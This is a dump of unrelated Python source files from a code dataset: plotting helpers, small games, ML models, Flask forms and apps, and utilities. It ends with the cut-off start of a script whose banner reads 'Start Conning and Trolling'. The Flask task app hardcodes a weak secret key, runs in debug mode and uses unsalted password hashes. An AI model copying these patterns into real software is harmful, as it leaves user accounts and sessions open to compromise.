content
stringlengths 5
1.05M
|
|---|
"""
This module contains utility functions that enhance Matplotlib
in one way or another.
"""
__all__ = ['wigner_cmap', 'MidpointNorm', 'complex_phase_cmap']
import numpy as np
try:
import matplotlib as mpl
from matplotlib import cm
from matplotlib.colors import (Normalize, ColorConverter)
except:
class Normalize(object):
def __init__(self, vmin=None, vmax=None, clip=False):
pass
def wigner_cmap(W, levels=1024, shift=0, max_color='#09224F',
mid_color='#FFFFFF', min_color='#530017',
neg_color='#FF97D4', invert=False):
"""A custom colormap that emphasizes negative values by creating a
nonlinear colormap.
Parameters
----------
W : array
Wigner function array, or any array.
levels : int
Number of color levels to create.
shift : float
Shifts the value at which Wigner elements are emphasized.
This parameter should typically be negative and small (i.e -1e-5).
max_color : str
String for color corresponding to maximum value of data. Accepts
any string format compatible with the Matplotlib.colors.ColorConverter.
mid_color : str
Color corresponding to zero values. Accepts any string format
compatible with the Matplotlib.colors.ColorConverter.
min_color : str
Color corresponding to minimum data values. Accepts any string format
compatible with the Matplotlib.colors.ColorConverter.
neg_color : str
Color that starts highlighting negative values. Accepts any string
format compatible with the Matplotlib.colors.ColorConverter.
invert : bool
Invert the color scheme for negative values so that smaller negative
values have darker color.
Returns
-------
Returns a Matplotlib colormap instance for use in plotting.
Notes
-----
The 'shift' parameter allows you to vary where the colormap begins
to highlight negative colors. This is beneficial in cases where there
are small negative Wigner elements due to numerical round-off and/or
truncation.
"""
cc = ColorConverter()
max_color = np.array(cc.to_rgba(max_color), dtype=float)
mid_color = np.array(cc.to_rgba(mid_color), dtype=float)
if invert:
min_color = np.array(cc.to_rgba(neg_color), dtype=float)
neg_color = np.array(cc.to_rgba(min_color), dtype=float)
else:
min_color = np.array(cc.to_rgba(min_color), dtype=float)
neg_color = np.array(cc.to_rgba(neg_color), dtype=float)
# get min and max values from Wigner function
bounds = [W.min(), W.max()]
# create empty array for RGBA colors
adjust_RGBA = np.hstack((np.zeros((levels, 3)), np.ones((levels, 1))))
zero_pos = int(np.round(levels * np.abs(shift - bounds[0])
/ (bounds[1] - bounds[0])))
num_pos = levels - zero_pos
num_neg = zero_pos - 1
# set zero values to mid_color
adjust_RGBA[zero_pos] = mid_color
# interpolate colors
for k in range(0, levels):
if k < zero_pos:
interp = k / (num_neg + 1.0)
adjust_RGBA[k][0:3] = (1.0 - interp) * \
min_color[0:3] + interp * neg_color[0:3]
elif k > zero_pos:
interp = (k - zero_pos) / (num_pos + 1.0)
adjust_RGBA[k][0:3] = (1.0 - interp) * \
mid_color[0:3] + interp * max_color[0:3]
# create colormap
wig_cmap = mpl.colors.LinearSegmentedColormap.from_list('wigner_cmap',
adjust_RGBA,
N=levels)
return wig_cmap
def complex_phase_cmap():
"""
Create a cyclic colormap for representing the phase of complex variables
Returns
-------
cmap :
A matplotlib linear segmented colormap.
"""
cdict = {'blue': ((0.00, 0.0, 0.0),
(0.25, 0.0, 0.0),
(0.50, 1.0, 1.0),
(0.75, 1.0, 1.0),
(1.00, 0.0, 0.0)),
'green': ((0.00, 0.0, 0.0),
(0.25, 1.0, 1.0),
(0.50, 0.0, 0.0),
(0.75, 1.0, 1.0),
(1.00, 0.0, 0.0)),
'red': ((0.00, 1.0, 1.0),
(0.25, 0.5, 0.5),
(0.50, 0.0, 0.0),
(0.75, 0.0, 0.0),
(1.00, 1.0, 1.0))}
cmap = mpl.colors.LinearSegmentedColormap('phase_colormap', cdict, 256)
return cmap
class MidpointNorm(Normalize):
"""Normalization for a colormap centered about a given midpoint.
Parameters
----------
midpoint : float (optional, default=0)
Midpoint about which colormap is centered.
vmin: float (optional)
Minimal value for colormap. Calculated from data by default.
vmax: float (optional)
Maximal value for colormap. Calculated from data by default.
Returns
-------
Returns a Matplotlib colormap normalization that can be used
with any colormap.
"""
def __init__(self, midpoint=0, vmin=None, vmax=None, clip=False):
self.midpoint = midpoint
Normalize.__init__(self, vmin, vmax, clip)
def __call__(self, value, clip=None):
x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]
return np.ma.masked_array(np.interp(value, x, y))
|
from random import randint
from time import sleep
itens = ('Pedra', 'Papel', 'Tesoura')
computador = randint(0, 2)
print('''\033[1;97;40mSuas opções:\033[49m
\033[92;40m[ 0 ] \033[93mPEDRA\033[49m
\033[92;40m[ 1 ] \033[93mPAPEL\033[49m
\033[92;40m[ 2 ] \033[93mTESOURA\033[49m''')
jogador = -1
while jogador < 0 or jogador > 2:
jogador = int(input('\033[97;40mQual é a sua jogada? '))
if jogador < 0 or jogador > 2:
print('\033[49m\n\033[91;40mJogada inválida. Tente novamente!\033[49m\n')
print('\033[49m\n\033[40mJO', end='')
sleep(0.5)
print('KEN', end='')
sleep(0.5)
print('PO!!!\033[49m')
sleep(1)
print('\033[49m' + '\033[95m-~' * 12)
print('\033[94mComputador jogou \033[96m{}\033[94m!'.format(itens[computador]))
print('Jogador jogou \033[96m{}\033[94m!'.format(itens[jogador]))
print('\033[95m-~' * 12)
if computador == 0:
if jogador == 0:
print('\033[96mEMPATOU\033[94m!')
elif jogador == 1:
print('\033[94mO jogador \033[96mGANHOU\033[94m!')
else:
print('\033[94mO computador \033[96mGANHOU\033[94m!')
elif computador == 1:
if jogador == 0:
print('\033[94mO computador \033[96mGANHOU\033[94m!')
elif jogador == 1:
print('\033[96mEMPATOU\033[94m!')
else:
print('\033[94mO jogador \033[96mGANHOU\033[94m!')
else:
if jogador == 0:
print('\033[94mO jogador \033[96mGANHOU\033[94m!')
elif jogador == 1:
print('\033[94mO computador \033[96mGANHOU\033[94m!')
else:
print('\033[96mEMPATOU\033[94m!')
|
#!/usr/bin/python3
# coding: UTF-8
"""
フォトリフレクタクラス
「電子情報通信設計製図」新潟大学工学部工学科電子情報通信プログラム
All rights revserved 2019-2020 (c) Shogo MURAMATSU
"""
import pygame
class LFPhotoReflector:
""" フォトリフレクタクラス
フォトリフレクタの応答を模擬しています。
ノイズを加えたり応答をスケールするなど、
実機のフォトリフレクタに合わせた調整は、
この部分で行うとよいでしょう。
"""
ACTIVE_WHITE = True # 白で1,黒で0.Falseのときは逆
def __init__(self,course,value = 0.0):
self._course = course
self._value = value
self._pos_px = [0.0, 0.0]
@property
def value(self):
return self.measurement()
@value.setter
def value(self,value):
self._value = value
@property
def pos_px(self):
return self._pos_px
@pos_px.setter
def pos_px(self,pos_px):
self._pos_px = pos_px
def measurement(self):
# センサ位置周辺の値をリターン
x_px = int(self._pos_px[0]+0.5)
y_px = int(self._pos_px[1]+0.5)
if 1 < y_px and y_px < self._course.height-1 and \
1 < x_px and x_px < self._course.width-1:
pxarray = pygame.PixelArray(self._course.image)
# 3x3 領域の平均を出力
acc = 0.0
for row in range(-1,2):
for col in range(-1,2):
acc = acc + float(pxarray[x_px+col][y_px+row] > 0)
if LFPhotoReflector.ACTIVE_WHITE:
value = acc/9.0 # 平均値
else:
value = 1.0 - acc/9.0 # 平均値
else:
value = 0.5
return value
|
from .pyutils.version import get_version
try:
# This variable is injected in the __builtins__ by the build
# process. It used to enable importing subpackages when
# the required packages are not installed
__SETUP__ # type: ignore
except NameError:
__SETUP__ = False
VERSION = (2, 0, 0, 'alpha', 0)
__version__ = get_version(VERSION)
if not __SETUP__:
from .promise import (
Promise,
promise_for_dict,
promisify,
is_thenable,
async_instance,
get_default_scheduler,
set_default_scheduler
)
from .scheduler import SyncScheduler, ThreadScheduler
__all__ = [
'Promise',
'promise_for_dict',
'promisify',
'is_thenable',
'async_instance',
'get_default_scheduler',
'set_default_scheduler',
'SyncScheduler',
'ThreadScheduler'
]
|
# Need to import the plotting package:
import matplotlib.pyplot as plt
from pylab import *
import numpy as np
import sys
FILENAME = sys.argv[1]
# Read the file.
f2 = open(FILENAME, 'r')
# read the whole file into a single variable,
# which is a list of every row of the file.
lines = f2.readlines()
f2.close()
# initialize some variable to be lists:
x1 = []
y1 = []
# scan the rows of the file stored in lines,
# and put the values into some variables:
for line in lines:
p = line.split(',')
x1.append(float(p[0]))
y1.append(float(p[1]))
xv = np.array(x1)
yv = np.array(y1)
# now, plot the data:
plt.plot(xv, yv)
# Set up
xlabel('Iterations')
ylabel('Value')
title('Learning Automata behaivor')
grid(True)
plt.show()
|
# coding: utf-8
from __future__ import unicode_literals
import logging
from wxpy.utils import handle_response
from .user import User
logger = logging.getLogger(__name__)
class Friend(User):
"""
好友对象
"""
@handle_response()
def set_remark_name(self, remark_name):
"""
设置或修改好友的备注名称
:param remark_name: 新的备注名称
"""
logger.info('setting remark name for {}: {}'.format(self, remark_name))
return self.bot.core.set_alias(userName=self.user_name, alias=str(remark_name))
|
import _thread
import socket
import ubinascii, network
from network import LoRa
from LoRaMeshLibrary.ReceiveBuffer import ReceiveBuffer
class ThreadSafeLoraSocket:
def __init__(self):
self.socketLock = _thread.allocate_lock()
self.lora = LoRa(mode=LoRa.LORA, region=LoRa.EU868)
self.lora_sock = socket.socket(socket.AF_LORA, socket.SOCK_RAW)
self.lora_sock.setblocking(True)
def send(self, bytes):
self.socketLock.acquire(1)
self.lora_sock.setblocking(True)
self.lora_sock.send(bytes)
self.socketLock.release()
def receive(self):
self.socketLock.acquire(1)
self.lora_sock.setblocking(False)
data = self.lora_sock.recv(ReceiveBuffer.BUFFER_SIZE)
loraStats = self.lora.stats()
self.socketLock.release()
return (data, loraStats)
def getMac(self):
return ubinascii.hexlify(self.lora.mac())[15]
|
"""
# !/usr/bin/env python
-*- coding: utf-8 -*-
@Time : 2022/6/4 下午4:26
@Author : Yang "Jan" Xiao
@Description :
reference:https://github.com/dominickrei/MatchboxNet
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchaudio.transforms import MFCC
from utils.utils import padding
class TCSConv(nn.Module):
'''
An implementation of Time-channel Seperable Convolution
**Arguments**
in_channels : int
The number of input channels to the layers
out_channels : int
The requested number of output channels of the layers
kernel_size : int
The size of the convolution kernel
Example
-------
>>> inputs = torch.randn(1, 64, 400)
>>> tcs_layer = TCSConv(64, 128, 11)
>>> features = tcs_layer(inputs)
>>> features.shape
torch.Size([1, 128, 400])
'''
def __init__(self, in_channels, out_channels, kernel_size):
super(TCSConv, self).__init__()
self.depthwise_conv = nn.Conv1d(in_channels, in_channels, kernel_size, groups=in_channels,
padding='same') # effectively performing a depthwise convolution
self.pointwise_conv = nn.Conv1d(in_channels, out_channels,
kernel_size=1) # effectively performing a pointwise convolution
def forward(self, x):
x = self.depthwise_conv(x)
x = self.pointwise_conv(x)
return x
class SubBlock(nn.Module):
'''
An implementation of a sub-block that is repeated R times
**Arguments**
in_channels : int
The number of input channels to the layers
out_channels : int
The requested number of output channels of the layers
kernel_size : int
The size of the convolution kernel
residual : None or torch.Tensor
Only applicable for the final sub-block. If not None, will add 'residual' after batchnorm layer
Example
-------
>>> inputs = torch.randn(1, 128, 600)
>>> subblock = SubBlock(128, 64, 13)
>>> outputs = subblock(inputs)
>>> outputs.shape
torch.Size([1, 64, 600])
'''
def __init__(self, in_channels, out_channels, kernel_size):
super(SubBlock, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.tcs_conv = TCSConv(self.in_channels, self.out_channels, self.kernel_size)
self.bnorm = nn.BatchNorm1d(self.out_channels)
self.dropout = nn.Dropout()
def forward(self, x, residual=None):
x = self.tcs_conv(x)
x = self.bnorm(x)
# apply the residual if passed
if residual is not None:
x = x + residual
x = F.relu(x)
x = self.dropout(x)
return x
class MainBlock(nn.Module):
'''
An implementation of the residual block containing R repeating sub-blocks
**Arguments**
in_channels : int
The number of input channels to the residual block
out_channels : int
The requested number of output channels of the sub-blocks
kernel_size : int
The size of the convolution kernel
R : int
The number of repeating sub-blocks contained within this residual block
residual : None or torch.Tensor
Only applicable for the final sub-block. If not None, will add 'residual' after batchnorm layer
Example
-------
>>> inputs = torch.randn(1, 128, 300)
>>> block = MainBlock(128, 64, 13, 3)
>>> outputs = block(inputs)
>>> outputs.shape
torch.Size([1, 64, 300])
'''
def __init__(self, in_channels, out_channels, kernel_size, R=1):
super(MainBlock, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.residual_pointwise = nn.Conv1d(self.in_channels, self.out_channels, kernel_size=1)
self.residual_batchnorm = nn.BatchNorm1d(self.out_channels)
self.sub_blocks = nn.ModuleList()
# Initial sub-block. If this is MainBlock 1, our input will be 128 channels which may not necessarily == out_channels
self.sub_blocks.append(
SubBlock(self.in_channels, self.out_channels, self.kernel_size)
)
# Other sub-blocks. Output of all of these blocks will be the same
for i in range(R - 1):
self.sub_blocks.append(
SubBlock(self.out_channels, self.out_channels, self.kernel_size)
)
def forward(self, x):
residual = self.residual_pointwise(x)
residual = self.residual_batchnorm(residual)
for i, layer in enumerate(self.sub_blocks):
if (i + 1) == len(self.sub_blocks): # compute the residual in the final sub-block
x = layer(x, residual)
else:
x = layer(x)
return x
class MatchboxNet(nn.Module):
'''
An implementation of MatchboxNet (https://arxiv.org/abs/2004.08531)
The input is expected to be 64 channel MFCC features
**Arguments**
B : int
The number of residual blocks in the model
R : int
The number of sub-blocks within each residual block
C : int
The size of the output channels within a sub-block
kernel_sizes : None or list
If None, kernel sizes will be assigned to values used in the paper. Otherwise kernel_sizes will be used
len(kernel_sizes) must equal the number of blocks (B)
NUM_CLASSES : int
The number of classes in the dataset (i.e. number of keywords.) Defaults to 30 to match the Google Speech Commands Dataset
Example
-------
>>> inputs = torch.randn(1, 64, 500)
>>> model = MatchboxNet(B=3, R=2, C=64,bins=64, NUM_CLASSES=30)
>>> outputs = model(inputs)
>>> outputs.shape
torch.Size([1, 30])
'''
def __init__(self, B, R, C, bins=64, kernel_sizes=None, NUM_CLASSES=30):
super(MatchboxNet, self).__init__()
if not kernel_sizes:
kernel_sizes = [k * 2 + 11 for k in range(1, 5 + 1)] # incrementing kernel size by 2 starting at 13
# the prologue layers
self.prologue_conv1 = nn.Conv1d(bins, 128, kernel_size=11, stride=2)
self.prologue_bnorm1 = nn.BatchNorm1d(128)
# the intermediate blocks
self.blocks = nn.ModuleList()
self.blocks.append(
MainBlock(128, C, kernel_sizes[0], R=R)
)
for i in range(1, B):
self.blocks.append(
MainBlock(C, C, kernel_size=kernel_sizes[i], R=R)
)
# the epilogue layers
self.epilogue_conv1 = nn.Conv1d(C, 128, kernel_size=29, dilation=2)
self.epilogue_bnorm1 = nn.BatchNorm1d(128)
self.epilogue_conv2 = nn.Conv1d(128, 128, kernel_size=1)
self.epilogue_bnorm2 = nn.BatchNorm1d(128)
self.epilogue_conv3 = nn.Conv1d(128, NUM_CLASSES, kernel_size=1)
# Pool the timesteps into a single dimension using simple average pooling
self.epilogue_adaptivepool = nn.AdaptiveAvgPool1d(1)
def forward(self, x):
# prologue block
x = self.prologue_conv1(x)
x = self.prologue_bnorm1(x)
x = F.relu(x)
# intermediate blocks
for layer in self.blocks:
x = layer(x)
# epilogue blocks
x = self.epilogue_conv1(x)
x = self.epilogue_bnorm1(x)
x = self.epilogue_conv2(x)
x = self.epilogue_bnorm2(x)
x = self.epilogue_conv3(x)
x = self.epilogue_adaptivepool(x)
x = x.squeeze(2) # (N, 30, 1) > (N, 30)
x = F.softmax(x, dim=1) # softmax across classes and not batch
return x
class MFCC_MatchboxNet(nn.Module):
def __init__(self, bins: int, B: int, R: int, n_channels, kernel_sizes=None, num_classes=12):
super(MFCC_MatchboxNet, self).__init__()
self.sampling_rate = 16000
self.bins = bins
self.num_classes = num_classes
self.mfcc_layer = MFCC(sample_rate=self.sampling_rate, n_mfcc=self.bins, log_mels=True)
self.matchboxnet = MatchboxNet(B, R, n_channels, bins=self.bins, kernel_sizes=kernel_sizes,
NUM_CLASSES=num_classes)
def forward(self, waveform):
mel_sepctogram = self.mfcc_layer(waveform)
mel_sepctogram = mel_sepctogram.squeeze(1)
mel_sepctogram = padding(mel_sepctogram, 128)
logits = self.matchboxnet(mel_sepctogram)
return logits
if __name__ == "__main__":
inputs = torch.randn(128, 64, 50)
inputs = padding(inputs, 128)
model = MatchboxNet(B=3, R=2, C=64, bins=64, NUM_CLASSES=30)
outputs = model(inputs)
print(outputs.shape)
|
# Back end of cypher
import collections
import string
def moduleTest(name):
print("Hello World!")
print("Hello " + name + ", how old art thu?")
def encrypt(word, rotationnum):
if word and rotationnum != "":
alphLib = collections.deque(string.ascii_lowercase)
word = word.lower()
rotationNum = int(rotationnum)
alphLib.rotate(rotationNum)
alphLib = ''.join(list(alphLib))
secret = ''
for letter in word:
if letter in string.ascii_lowercase:
position = string.ascii_lowercase.index(letter)
newletter = alphLib[position]
secret = secret + newletter
else:
secret = secret + letter
else:
secret = "Invalid Input... :("
return secret
|
from datetime import date
from flask_wtf import FlaskForm
from flask_wtf.file import FileField
from wtforms import (
IntegerField,
PasswordField,
RadioField,
SelectField,
StringField,
SubmitField,
)
from wtforms.fields.html5 import DateField
from wtforms.validators import (
DataRequired,
Email,
EqualTo,
InputRequired,
Length,
Optional,
)
from petsrus.forms.validators import ExistingName, FutureDate, PastDate
from petsrus.models.models import Repeat, RepeatCycle, ScheduleType
class RegistrationForm(FlaskForm):
username = StringField(
"Username:",
validators=[
InputRequired(message="Please enter your username"),
Length(
min=4,
max=25,
message="Username must be between 4 to 25 characters in length",
),
],
)
password = PasswordField(
"Password:",
validators=[
InputRequired(message="Please enter your password"),
EqualTo("confirm_password", message="Passwords must match"),
Length(min=8, message="Password should be aleast 8 characters in length"),
],
)
confirm_password = PasswordField("Confirm password:")
email_address = StringField(
"Email address:",
validators=[
InputRequired(message="Please enter your email address"),
Email(message="Please enter a valid email address"),
Length(min=6, max=35),
],
)
telephone = StringField("Telephone:")
country = StringField("Country:")
register = SubmitField("Register")
class LoginForm(FlaskForm):
username = StringField(
"Username:", validators=[InputRequired(message="Please enter your username")]
)
password = PasswordField(
"Password:", validators=[InputRequired(message="Please enter your password")]
)
login = SubmitField("Login")
class PetForm(FlaskForm):
name = StringField(
"Name:",
validators=[
InputRequired(message="Please enter a name"),
Length(
min=2,
max=24,
message="Name must be between 2 to 25 characters in length",
),
],
)
date_of_birth = DateField(
"Date of Birth:",
format="%Y-%m-%d",
validators=[
DataRequired(message="Please enter a Date of Birth (YYYY-MM-DD)"),
PastDate(message="Please enter a date before {}".format(date.today())),
],
)
species = StringField(
"Species:",
validators=[
InputRequired(message="Please provide species details"),
Length(
min=4,
max=10,
message="Species must be between 4 to 10 characters in length",
),
],
)
breed = StringField(
"Breed:",
validators=[
InputRequired(message="Please provide breed details"),
Length(
min=5,
max=25,
message="Breed must be between 5 to 25 characters in length",
),
],
)
sex = StringField(
"Sex:",
validators=[
InputRequired(message="Please provide pet sex details"),
Length(min=1, max=1, message="Enter M or F for sex"),
],
)
colour_and_identifying_marks = StringField("Colour and identifying marks:")
save = SubmitField("Save")
class PetScheduleForm(FlaskForm):
pet_id = IntegerField("Pet id")
date_of_next = DateField(
"Date of Next:",
format="%Y-%m-%d",
validators=[
InputRequired(message="Please enter the Date (YYYY-MM-DD)"),
FutureDate(
message="Please enter a date greater than today {}".format(date.today())
),
],
)
repeats = RadioField(
"Repeats:",
choices=Repeat.__values__,
validators=[InputRequired(message="Please select either Yes or No")],
)
repeat_cycle = RadioField(u"Repeat Cycle:", coerce=int, validators=[Optional()])
schedule_type = SelectField(u"Schedule Types", coerce=int)
save = SubmitField("Save")
class ChangePetPhotoForm(FlaskForm):
photo = FileField()
save = SubmitField("Upload Photo")
class RepeatCycleForm(FlaskForm):
repeat_cycle_name = StringField(
"Name:",
validators=[
InputRequired(message="Please provide a Repeat Cycle eg Daily, Weekly etc"),
Length(
min=5,
max=20,
message="Name must be between 5 to 20 characters in length",
),
ExistingName(
RepeatCycle, message="Sorry, this Repeat Cycle already exists"
),
],
)
save = SubmitField("Add Repeat Cycle")
class ScheduleTypeForm(FlaskForm):
schedule_type_name = StringField(
"Name:",
validators=[
InputRequired(
message="Please provide a Schedule Type eg Deworming, Vaccine etc"
),
Length(
min=5,
max=20,
message="Name must be between 5 to 20 characters in length",
),
ExistingName(
ScheduleType, message="Sorry, this Schedule Type already exists"
),
],
)
save = SubmitField("Add Schedule Type")
|
from flask import Flask
from flask import request
from flask import render_template
from flask import url_for
from flask import redirect
from flask import jsonify
from flask import session
from flask import flash
import hashlib, binascii
import sqlite3
app = Flask(__name__)
conn = None
# Get the current connection
def get_conn():
global conn
if conn is None:
conn = sqlite3.connect('database.sql')
# Dictionary results
conn.row_factory = sqlite3.Row
return conn
# Close the connection
def close_connection():
global conn
if conn is not None:
conn.close()
# Query the database from the connection
def query_db(query, args=(), one=False):
cur = get_conn().cursor()
cur.execute(query, args)
r = cur.fetchall()
cur.close()
return (r[0] if r else None) if one else r
# Add a task to the database
def add_task(category, priority, description):
query_db('INSERT INTO tasks values(?, ?, ?)', (category, priority, description), one=True)
get_conn().commit()
# Delete task from database
def delete_task(rowid):
query_db('DELETE FROM tasks WHERE rowid=(?)', (rowid))
get_conn().commit()
#Valid the username and password
def validate(username, password):
#Used as a smaller substitute, as in comparison to SHA256 or SHA512
dk = hashlib.new('ripemd160')
dk.update(password)
password = dk.hexdigest()
return query_db('SELECT * from users where username=(?) and password=(?)', (username, password), one=True)
#Adding and getting tasks
@app.route('/', methods=['GET', 'POST'])
def tasks():
if request.method == "POST" and 'logged_in' in session:
category = request.form['category']
priority = request.form['priority']
description = request.form['description']
add_task(category, priority, description)
flash('New task was successfully added')
return redirect(url_for('tasks'))
else:
tasks = query_db('SELECT rowid, * FROM tasks ORDER BY priority DESC')
return render_template('index.html', tasks=tasks)
#Logging in
@app.route('/login', methods=['POST'])
def login():
username = request.form['username']
password = request.form['password']
if (validate(username, password)):
session['logged_in'] = True
flash("Login Successful")
else:
flash('Error: Invalid Password')
return redirect(url_for('tasks'))
# Logout, clear session information
@app.route('/logout', methods=['GET'])
def logout():
session.clear()
return redirect(url_for('tasks'))
# Delete a task
@app.route('/delete', methods=['POST'])
def delete():
if 'logged_in' in session and session['logged_in']:
rowid = request.form['rowid']
delete_task(rowid)
flash('Deleted task successfully')
return jsonify({'status': True})
else:
return jsonify({'status': False})
if __name__ == "__main__":
# Really lame keys and startup
app.secret_key = 'something really secret'
app.config['SESSION_TYPE'] = 'filesystem'
app.debug = True
app.run()
|
"""Main entry point to mypy annotation inference utility."""
import json
from typing import List
from typing_extensions import TypedDict
from typewriter.annotations.infer import infer_annotation
from typewriter.annotations.parse import parse_json
from typewriter.annotations.types import ARG_STAR, ARG_STARSTAR
# Schema of a function signature in the output
Signature = TypedDict('Signature', {'arg_types': List[str],
'return_type': str})
# Schema of a function in the output
FunctionData = TypedDict('FunctionData', {'path': str,
'line': int,
'func_name': str,
'signature': Signature,
'samples': int})
SIMPLE_TYPES = {'None', 'int', 'float', 'str', 'bytes', 'bool'}
def unify_type_comments(type_comments):
# type: (List[str]) -> Signature
arg_types, return_type = infer_annotation(type_comments)
arg_strs = []
for arg, kind in arg_types:
arg_str = str(arg)
if kind == ARG_STAR:
arg_str = '*%s' % arg_str
elif kind == ARG_STARSTAR:
arg_str = '**%s' % arg_str
arg_strs.append(arg_str)
return {
'arg_types': arg_strs,
'return_type': str(return_type),
}
def is_signature_simple(signature):
# type: (Signature) -> bool
return (all(x.lstrip('*') in SIMPLE_TYPES for x in signature['arg_types']) and
signature['return_type'] in SIMPLE_TYPES)
def generate_annotations_json_string(source_path, only_simple=False):
# type: (str, bool) -> List[FunctionData]
"""Produce annotation data JSON file from a JSON file with runtime-collected types.
Data formats:
* The source JSON is a list of typewriter.annotations.parse.RawEntry items.
* The output JSON is a list of FunctionData items.
"""
items = parse_json(source_path)
results = []
for item in items:
signature = unify_type_comments(item.type_comments)
if is_signature_simple(signature) or not only_simple:
data = {
'path': item.path,
'line': item.line,
'func_name': item.func_name,
'signature': signature,
'samples': item.samples
} # type: FunctionData
results.append(data)
return results
def generate_annotations_json(source_path, target_path, only_simple=False):
# type: (str, str, bool) -> None
"""Like generate_annotations_json_string() but writes JSON to a file."""
results = generate_annotations_json_string(source_path, only_simple=only_simple)
with open(target_path, 'w') as f:
json.dump(results, f, sort_keys=True, indent=4)
|
import tensorflow as tf
import tensorflow_addons as tfa
from numpy import pi
def rotate_images(ds):
"""
Rotate images by 90, 180, and 270 degrees. Quadruple size of dataset.
Args:
ds (TensorFlow dataset): image dataset on which to perform the augmentation
Returns:
ds (TensorFlow dataset): augmented dataset
"""
ds_rotated_90 = ds.map(lambda x,y: (tfa.image.rotate(x, angles=0.5*pi), y))
ds_rotated_180 = ds.map(lambda x,y: (tfa.image.rotate(x, angles=pi), y))
ds_rotated_270 = ds.map(lambda x,y: (tfa.image.rotate(x, angles=1.5*pi), y))
ds = ds_rotated_90.concatenate(ds_rotated_180).concatenate(ds_rotated_270)
return ds
def apply_mean_filter(ds, filter_shape=7):
"""
Perform mean filtering on images. Replace image values by mean of neighbouring values,
effectively introducing a blur and reducing sharpness of the image.
Args:
ds (TensorFlow dataset): image dataset on which to perform the augmentation
filter_shape (int): size of the filter with which to perform the convolution. Default: 7 (7x7 filter size)
Returns:
ds (TensorFlow dataset): augmented dataset
"""
ds_mean_filtered = ds.map(lambda x,y: (tfa.image.mean_filter2d(x, filter_shape=filter_shape), y))
return ds_mean_filtered
def apply_gaussian_filter(ds, filter_shape=7, sigma=2.0):
"""
Apply a Gaussian image blur. Replace image values by neighbouring values, weighted by a Gaussian function.
Double the size of the input dataset.
Args:
ds (TensorFlow dataset): image dataset on which to perform the augmentation
filter_shape (int): size of the filter with which to perform the convolution. Default: 7 (7x7 filter size)
sigma (float): standard deviation of the Gaussian function in both x and y direction. Default: 2.0
Returns:
ds (TensorFlow dataset): augmented dataset
"""
ds_gaussian = ds.map(lambda x,y: (tfa.image.gaussian_filter2d(x, filter_shape=filter_shape, sigma=sigma), y))
return ds_gaussian
def random_hsv(ds):
"""
Randomly adjust hue, saturation, value of an RGB image in the YIQ color space.
Args:
ds (TensorFlow dataset): image dataset on which to perform the augmentation
Returns:
ds (TensorFlow dataset): augmented dataset
"""
ds_hsv = ds.map(lambda x,y: (tfa.image.random_hsv_in_yiq(x, max_delta_hue=0.8, lower_saturation=0.2, upper_saturation=0.8, lower_value=0.2, upper_value=0.8), y))
return ds_hsv
def add_noise(ds, sd=0.2):
"""
Add randomly sampled noise to image values. Clip afterwards to ensure values stay in range [0,1].
Sample from normal distribution.
Args:
ds (TensorFlow dataset): image dataset on which to perform the augmentation
sd (float): standard deviation of the normal distribution. Higher values = more noise, Default: 0.2
Returns:
ds (TensorFlow dataset): augmented dataset
"""
ds_noise = ds.map(lambda x,y: (x + tf.random.normal(x.shape, mean=0.0, stddev=sd, dtype=tf.float32), y))
ds_noise = ds_noise.map(lambda x,y: (tf.clip_by_value(x, 0.0, 1.0), y))
return ds_noise
|
while True:
c = input('Digite o sexo [M/F] : ').strip().lower()
if c in 'mf':
break
else:
print('Erro! Digite uma letra válida! ')
print(f'Você selecionou o sexo "{c.upper()}"')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
##################################################
#
# make_fsg.py
#
# This module takes a text file, marked up with
# units (e.g. w for word, m for morpheme) and ids
# and converted to IPA, and outputs a FSG
# file for processing by PocketSphinx.
#
##################################################
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import datetime
import os
import pystache
from readalongs.text.util import load_xml, save_txt
# ###################3
#
# For making an FSG from a SMIL, we have the following rules:
#
# -- All children of a SEQ element are subject to alignment, in the order they
# occur.
#
# -- Only one TEXT child of a PAR element is subject to alignment, with a
# for the first child.
#
# -- a BODY element is treated exactly as a SEQ
#
#
# TODO: AP: Do we need this? It doesn't appear to be used anywhere.
# There's also an undefined variable error on line 90.
# TODO: Add numpy standard docstrings to functions
#########################
class GrammarComposite:
def __init__(self, id):
self.id = id
self.children = []
def append(self, child):
self.children.append(child)
def get_id_as_str(self):
return "<%s>" % self.id
class GrammarChoice(GrammarComposite):
def to_jsgf(self):
results = []
child_ids = " | ".join(c.get_id_as_str() for c in self.children)
results.append("%s = %s" % (self.get_id_as_str(), child_ids))
for child in self.children:
results += child.to_jsgf()
return results
class GrammarSequence(GrammarComposite):
def to_jsgf(self):
results = []
child_ids = " ".join(c.get_id_as_str() for c in self.children)
results.append("%s = %s" % (self.get_id_as_str(), child_ids))
for child in self.children:
results += child.to_jsgf()
return results
def make_sequence(seq_node):
for child in seq_node:
# TODO: flake8 flags child_id as an unused variable, and indeed, this function
# basically does nothing. Figure out what it's supposed to do and fix this
# function! -EJ
child_id = child.attrib["id"]
def make_jsgf(smil, unit="m"):
body_node = xpath_default(smil, ".//i:body")[0]
for child in body_node:
print(child.tag)
def main(input_filename, output_filename, unit):
smil = load_xml(input_filename)
jsgf = make_jsgf(smil, unit)
# save_txt(output_filename, jsgf)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Make an JSGF grammar from an XML file with IDs"
)
parser.add_argument("input", type=str, help="Input SMIL")
parser.add_argument("output_jsgf", type=str, help="Output .jsgf file")
parser.add_argument(
"--unit",
type=str,
default="m",
help="XML tag of the unit of analysis " '(e.g. "w" for word, "m" for morpheme)',
)
args = parser.parse_args()
main(args.input, args.output_fsg, args.unit)
|
import torch
if __name__ == '__main__':
generator = torch.Generator(device="cpu")
generator.manual_seed(1904)
print(torch.randint(0, 2, (10,),generator=generator))
print(torch.randint(0, 2, (10,),generator=None))
|
import socket, os, time
import cv2, numpy
banner ="""
( * ) ( (
)\ ` ) /( ( )\ )\
(((_) ( ( ( )(_)) )( ( ((_) ((_)
)\___ )\ )\ ) (_(_()) (()\ )\ _ _
((/ __| ((_) _(_/( |_ _| ((_) ((_) | | | |
| (__ / _ \ | ' \)) | | | '_| / _ \ | | | |
\___| \___/ |_||_| |_| |_| \___/ |_| |_|
(C) Start Conning and Trolling TODAY!!
